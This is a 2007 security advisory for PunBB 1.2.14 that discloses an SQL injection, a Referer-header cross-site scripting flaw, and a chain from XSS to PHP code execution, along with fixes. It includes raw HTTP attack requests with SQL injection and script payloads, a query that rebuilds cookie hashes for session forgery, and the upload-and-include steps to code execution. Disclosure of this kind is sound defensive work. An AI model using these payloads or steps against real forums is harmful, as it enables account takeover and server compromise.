PunBB <= 1.2.14 Multiple Vulnerabilities (Advisory)

2007-04-12T00:00:00
ID SECURITYVULNS:DOC:16681
Type securityvulns
Reporter Securityvulns
Modified 2007-04-12T00:00:00

Description

   Title:    PunBB <= 1.2.14 Multiple Vulnerabilities
  Author:    DarkFig < gmdarkfig (at) gmail (dot) com >

Written on: 2007/04/08 Released on: 2007/04/11 Risk level: High URL: http://www.acid-root.new.fr/advisories/13070411.txt Summary: SQL Injection, Cross site scripting, Code execution Solution: A new version of PunBB (1.2.15) has been released.

-=[ DESCRIPTION ]

PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License. Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards. PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller, semantically correct XHTML-compliant pages.

-=[ VULN #1 ]

Risk level: Medium Type: SQL Injection Conditions: PHP <= 4.4.2 or PHP <= 5.1.3 register_globals=On ini_get() problem

The "search.php" file contains the following php code:

49| if (isset($_GET['action']) || isset($_GET['search_id'])) | [...] 54| if (isset($search_id)) unset($search_id); 55| 56| // If a search_id was supplied 57| if (isset($_GET['search_id'])) 58| { 59| $search_id = intval($_GET['search_id']); 60| if ($search_id < 1) 61| message($lang_common['Bad request']); 62| } | [...] 100| if (isset($search_id)) 104| $result = $db->query('SELECT search_data FROM '.$db->prefix | .'search_cache WHERE id='.$search_id.' AND ident=\'' | .$db->escape($ident).'\'') or [...]

When I did see this code, I thought that there was an SQL Injection with the Zend_Hash_Del_Key_Or_Index vulnerability and register_globals=On. But let's see another file, the "include/common.php" file contains the following code:

39| // Reverse the effect of register_globals 40| if (@ini_get('register_globals')) 41| unregister_globals();

If ini_get('register_globals') returns TRUE, the unregister_globals() function is called. The "@" has been used if an error occured (Warning..), because on many servers this function is disabled for security reasons. It's the case on my server, if I remove @, I obtain this :

Warning: ini_get() has been disabled for security reasons in [...]

In this case, ini_get('register_globals') returns FALSE even if register_globals=On, so unregister_globals() isn't called. The unregister_globals() functions contains the following code:

1037| function unregister_globals() 1038| { 1039| // Prevent script.php?GLOBALS[foo]=bar 1040| if (isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) 1041| exit('bip bip biiiiiiiip'); 1042|
1043| // Variables that shouldn't be unset 1044| $no_unset = array('GLOBALS', '_GET', '_POST', '_COOKIE', | '_REQUEST', '_SERVER', '_ENV', '_FILES'); 1045| 1046| // Remove elements in $GLOBALS that are present in any of | the superglobals 1047| $input = array_merge($_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, | $_FILES, isset($_SESSION) && is_array($_SESSION) ? $_SESSION : array()); 1048| foreach ($input as $k => $v) 1049| { 1050| if (!in_array($k, $no_unset) && isset($GLOBALS[$k])) 1051| { 1052| unset($GLOBALS[$k]); 1053| unset($GLOBALS[$k]); // zend_hash_del_key_or_index protection 1054| } 1055| } 1056| }

If register_globals=On and if there is a problem (see [1] / [2] for example) concerning the ini_get() function, there is an SQL Injection (with the Zend_Hash_Del_Key_Or_Index vulnerability). The attacker will forge an HTTP packet which looks like this:

GET /punbb1-2-14/search.php?action=show_new HTTP/1.1\r\n Host: localhost\r\n Connection: keep-alive\r\n Cookie: punbb_cookie=<thecookiehere>\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 55\r\n\r\n search_id=-1%20OR%201%3D1%23&1986084953=1&-1234899993=1\r\n\r\n

After getting the password (hashed), you don't need to break it. As Nms (see [3]) said, it's easy to forge a cookie. Let's see the check_cookie() function:

39| if (isset($_COOKIE[$cookie_name])) 40| list($cookie['user_id'], $cookie['password_hash']) = | @unserialize($_COOKIE[$cookie_name]); | [...] 49| if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) !== | $cookie['password_hash'])

The $cookie_seed value is stored in the "config.php" file, but we can retrieve it with an SQL request (with the SQL Injection). The hash stored in the cookie ($cookie['password_hash']) looks like this:

mysql> SELECT MD5( -> CONCAT( -> SUBSTR( -> MD5( -> / $cookie_seed value / -> (SELECT registered FROM users WHERE LENGTH(registered)=10 -> ORDER BY registered LIMIT 1)),-8), -> / The hashed password / -> (SELECT password FROM users WHERE id=<user_id>))) -> / Ouput -> f4684bb1418c241992c6b8f9d70a4edb /;

The solution is quite simple, in "include/common.php", remove the condition ("if(ini_get...") and even if ini_get('register_globals') returns FALSE, apply the unregister_globals() function.

-=[ VULN #2 ]

Risk level: Low Type: Cross Site Scripting Conditions: none

In the "misc.php" file the "Referer" header isn't properly filtered before being used. The file contains the following code:

128| $redirect_url = (isset($_SERVER['HTTP_REFERER']) && | preg_match('#^'.preg_quote($pun_config['o_base_url']).'/(.*?)\.php#i', | $_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : 'index.php'; | [...] 146| <input type="hidden" name="redirect_url" value=" | <?php echo $redirect_url ?>" />

This can lead to cross site scripting attacks, for example send this HTTP packet (with a valid email id):

GET http://localhost/punbb1-2-14/misc.php?email=3 HTTP/1.1\r\n Host: localhost\r\n Referer: http://localhost/punbb1-2-14/misc.php?email=3"><script>alert(1)</script>\r\n Connection: keep-alive\r\n Cookie: punbb_cookie=<thecookie>\r\n\r\n

If the attacker knows how to use Ajax, it's quite easy to exploit (with setRequestHeader). But let's see how this can be used...

-=[ VULN #3 ]

Risk level: High Type: Code execution Conditions: none

With punBB an XSS can lead to ... php code execution ! We can

use the 'Referer' XSS to lead this attack. There is also another XSS in the admin pannel . When we add a category (admin_categories.php) like '<script>alert(1)</script>', the code is executed when we wanna remove the created category. Now, serious things begin ... The script "footer.php" contains the following code:

136| $tpl_temp = trim(ob_get_contents()); 137| $tpl_main = str_replace('<pun_footer>', $tpl_temp, $tpl_main); 138| ob_end_clean(); | [...] 143| while (preg_match('#<pun_include "([^/\\\\]*?)">#', $tpl_main, $cur_include)) 144| { 145| if (!file_exists(PUN_ROOT.'include/user/'.$cur_include[1])) 146| error('[...]'); 147|
148| ob_start(); 149| include PUN_ROOT.'include/user/'.$cur_include[1]; 150| $tpl_temp = ob_get_contents(); 151| $tpl_main = str_replace($cur_include[0], $tpl_temp, $tpl_main); 152| ob_end_clean(); 153| }

So if the content of the page contains '<pun_include "file.php"', if the file is situated in 'include/user/', the file will be include. We can't use \\ or /, but it's not enough protected. With the "admin_options.php" file, we can change the avatars directory. Let's change this parameter to "include/user". By now when a user will upload a file, the file will be uploaded in "include/user". If the user uploads a fake JPG file (which contains php code) , the file will be situated in "include/user". Now the attacker have to include the uploaded file. He will execute the php code with the XSS (<pun_include "my_id.jpg">). An exploit has been released [4].

-=[ LINKS ]

[1] Warning: ini_get() has been disabled for security reasons http://www.google.fr/search?q=warning%3A+ini_get+has+been

[2] ini_get returns values from other vservers http://bugs.php.net/bug.php?id=21874

[3] PunBB <= 1.2.13 Multiple Vulnerabilities http://wargan.org/index.php/2006/10/29/4-punbb-1213-multiple-vulnerabilities

[4] PunBB <= 1.2.14 Remote Code Execution Exploit http://www.acid-root.new.fr/poc/29070411.txt

[5] Related fixes http://dev.punbb.org/changeset/933 http://dev.punbb.org/changeset/934 http://dev.punbb.org/changeset/937 http://dev.punbb.org/changeset/938

// Greetz: ddx39, lorenzo, sparah, romano